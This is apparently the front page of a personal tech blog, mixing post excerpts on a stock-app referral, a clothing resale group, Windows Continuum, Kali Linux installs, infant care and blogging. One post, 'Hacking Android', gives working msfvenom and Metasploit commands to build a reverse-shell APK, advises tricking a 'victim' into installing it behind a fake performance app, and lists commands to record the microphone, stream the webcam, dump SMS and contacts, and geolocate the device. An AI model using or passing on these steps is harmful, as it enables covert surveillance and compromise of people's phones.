Search

The Life of Josh

Computer Engineer, Security Consultant, and Tech Nerd.

Robinhood Investing

Robinhood is pretty cool. No fees to create an account and you get a free share of a stock when signing up which is neat. When creating an account you can put in even $5 to open.

https://share.robinhood.com/joshual1732

Lots of good reviews of Robinhood out there. Full disclosure: If you click my link you and I each get a share of a stock. With the market down it might be a good time to buy in to the dip and benefit when the correction passes.

Advertisements

Phoenix Boutique

My wife has had a little bit of an obsession with LuLaRoe and then Charlie’s Project. She finds all sorts of interesting leggings and clothing from them. Some she sells and some she keeps. It’s been a bit of a hobby for a little bit for her. The other day she created a Facebook group;

Phoenix Boutique

It’s where she will post the stuff she is selling. She only charges about $3 shipping if the person isn’t local. Usually she tries to just break even on the shipping, and she tries to sell things for a reasonable price. I hope she does well enough to be happy with it because it’s fun for her to get cool things and find people who want those things. Right now it’s Charlie’s Project clothes, candles, and soaps. If you have any interest then check out her FaceBook group. Trying to spread the word because it makes her happy.

Hacking Android

msfvenom is a kali linux hacking tool for android. It is a combination of Msfpayload and Msfencode, putting both of these tools into a single Framework instance known as msfvenom payload.

Steps:

1. Open a terminal window.

2. Set payload and create custom windows executable.

root@kali:-# msfvenom -p android/meterpreter/reverse_tcp  LHOST=192.168.0.7 LPORT=443 R > main.apk

  • LHOST is your local IP which you can obtain via ifconfig
    LPORT is the local port that will listen for connections. 443 is appropriate.
  • Your apk file will saved in whatever folder you are in when you run the above command.

Note: The above command is a single long line.

3. Transfer/mail this file (here main.apk) file to the victim’s Android device and have them install it. There is a social engineering aspect of deploying this. On Mr. Robot there was a good example of tricking someone in to thinking they are running a performance measuring app. That demo used a web page that has the APK to install, and then after installing it the website has fake performance results so the victim has no idea anything strange has happened.

4. Start the metasploit framework console as follows :

root@kali:-# msfconsole

5. Open and setup multi-handler :

msf  > use multi/handler
msf exploit(handler) > set payload android/meterpreter/reverse_tcp
msf exploit(handler) > set LHOST 192.168.1.5
msf exploit(handler) > set LPORT 443
msf exploit(handler) > exploit

        Payload Handler is being started……..

6. When the victim clicks on the app (installed as main activity in the menu) in his phone, meterpreter session will be established.

7. Try the following exploit commands :
– record_mic
– webcam_snap
– webcam_stream
– dump_contacts
– dump_sms
– geolocate

 

Microsoft Windows Continuum

Palm was at least 9 years ahead of their time. Such a shame they came out with the Foleo ( http://allthingsd.com/20070530/palm-foleo/ ) before the world was ready. Enter the HP Elite x3 ( http://www.windowscentral.com/hands-hp-elite-x3-lap-dock ) which is the Windows Phone equivalent. It makes sense because HP owns Palm’s IP since 2010. I think this is super cool, but it may yet still be ahead of time. Apple seems to have been working at slowing down their major innovations. This makes me sad because I have always loved Apple products, but I think the loss of Jobs has taken a lot of the energy away from Apple. Google seems to be always working at putting everything in their cloud so the devices all access their cloud storage+apps, but I don’t have 100% reliable always-on Internet everywhere I am yet. Microsoft seems to have continued building their phone platform despite having a phone platform that nobody has really cared about since it was released. I am hopeful that they will eventually see the fruits of their labor. This HP Elite unit is really amazing, and I do look forward to the day that my “phone” is my core device that uses other hardware as needed. 

If you are in to tech check out Microsoft Continuum ( https://www.microsoft.com/en-us/windows/Continuum ) to learn more about Windows Phone behaving like a desktop or laptop. In the video you’ll see the phone connected by cable to a dock when using it as a desktop. It’s USB-C and can charge the phone while using it, but you can also go wireless with the HP Lapdock as well as the TV adapter. Very cool stuff. Santa please bring me an HP Elite + Lapdock! Please? If not this year then hopefully next year’s version is ok too. 

LazyKali reboot

I am making available the beginning of a re-write of what I think is a helpful utility for Kali Linux systems. These systems are used for penetration testing, and are not typically day-to-day systems. I find myself doing the same installs and maintenance with every re-install of Kali so I wanted to create a tool to simplify this. It appears that until about 3 years ago someone else had a similar idea, but they seem to have abandoned it. If anyone knows if there is a current version of lazykali out there in the Interweb could you please point me to it so that I might contribute to that instead of maintaining this fork. If Reaperz73 sees this please contact me to let me know you are out there.

Continue reading “LazyKali reboot”

Kali Linux install on a Lenovo T430s

I have been working with Kali Linux lately for the pentest tools, and to keep my skills current. To that end I wanted to put the latest version of Kali on a Lenovo T430s laptop. I started with the kali-linux-2016.1-amd64.iso download. Then I wrote that to a USB key using Universal USB Installer ( http://www.pendrivelinux.com/universal-usb-installer-easy-as-1-2-3/ ) and tried to install Kali on my laptop.

Continue reading “Kali Linux install on a Lenovo T430s”

Hacking made easy and good reads

I was just watching Mr. Robot … an excellent TV show that any security person should find interest in, and they use actual hacking tools and techniques in the show. I saw the Social Engineering Toolkit used on S2 E1. I’ve used Kali Linux before, but never gave much thought to the SET application. If you have 22 minutes to spare and want to see how easy it is to social engineer your way to compromise credentials then watch this…

Continue reading “Hacking made easy and good reads”

Can you overfeed an infant?

For Stacey and I the birth of Erikson has been almost like the birth of a first child. Even though both of us have been through the first years of raising children before, we feel as though we can’t remember any of what went on. Perhaps the sleep deprivation causes memory loss during the early days. Everything seems new, and a lot harder than when we were younger. We think maybe we’re old. 🙂

Continue reading “Can you overfeed an infant?”

Getting started with Blogging using WordPress.com

So you’ve decided that you wanted a platform to write. Why not use FaceBook, Google+, or even MySpace? In my opinion those platforms are good for argume…. Err.. I mean conversations, but they aren’t really the best place to publish a review of a piece of software, or articles to help configure routers, or most things that are more information than a blurb or rant. Blogging gives you the ability to categorize, tag, provide permanent links, and control formatting on your writing. It lets you share what you want, in the way that you want. For me I’m sharing links to my blog through other platforms so that anyone who finds an article will find it, but that’s about all. I will say that I do like the way that LinkedIn has approached writing articles, but not all of mine will be worth sharing there so I’ll opt to write it all here, and share to LinkedIn as appropriate.

Continue reading “Getting started with Blogging using WordPress.com”

Blog at WordPress.com.

Up ↑

%d bloggers like this: